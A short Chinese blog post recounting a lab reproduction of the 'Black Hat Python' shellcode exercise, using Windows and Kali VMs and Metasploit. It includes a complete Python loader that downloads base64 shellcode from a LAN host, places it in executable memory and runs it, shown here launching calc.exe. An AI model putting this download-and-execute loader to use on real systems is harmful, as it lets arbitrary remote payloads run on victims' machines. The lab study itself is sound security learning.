近期收到了電子工業出版社贈送的一本網絡安全書籍《python黑帽子》,書中一共24個實驗,今天復現第21個實驗( shellcode),我的測試環境是windows10虛擬機(32位)+kali虛擬機+conda開發環境+python3.7+MSF框架。過程有點曲折,因為是32位windows環境,因為之前實驗導致自己電腦壞了,我從vitualbox虛擬機更換成了vmware虛擬機,順利完成本次實驗,其中心酸苦楚,還是自己承受吧(熬夜真難受)~
1、生成windows系統的shellcode
2、對shellcode進行base64編碼
3、在kali上啟動一個http服務(我這裡演示用的是python2,後來我又換成了python3)
4、在32位windows環境中,運行腳本,即可彈出計算器,即shell執行了calc.exe命令
參考代碼:
# -*- coding: utf-8 -*-
# @Time : 2022/6/25 10:40 PM
# @Author : ailx10
# @File : shell_exec.py
from urllib import request
import base64
import ctypes
kernel32 = ctypes.windll.kernel32
def get_code(url):
with request.urlopen(url) as response:
shellcode = base64.decodebytes(response.read())
return shellcode
def write_memory(buf):
length = len(buf)
kernel32.VirtualAlloc.restype = ctypes.c_void_p
kernel32.RtlMoveMemory.argtypes = (ctypes.c_void_p,ctypes.c_void_p,ctypes.c_size_t)
ptr = kernel32.VirtualAlloc(None,length,0x3000,0x40)
kernel32.RtlMoveMemory(ptr,buf,length)
return ptr
def run(shellcode):
buffer = ctypes.create_string_buffer(shellcode)
ptr = write_memory(buffer)
shell_func = ctypes.cast(ptr,ctypes.CFUNCTYPE(None))
shell_func()
if __name__ == "__main__":
url = "http://192.168.199.247:8888/shellcode.bin"
shellcode = get_code(url)
run(shellcode)
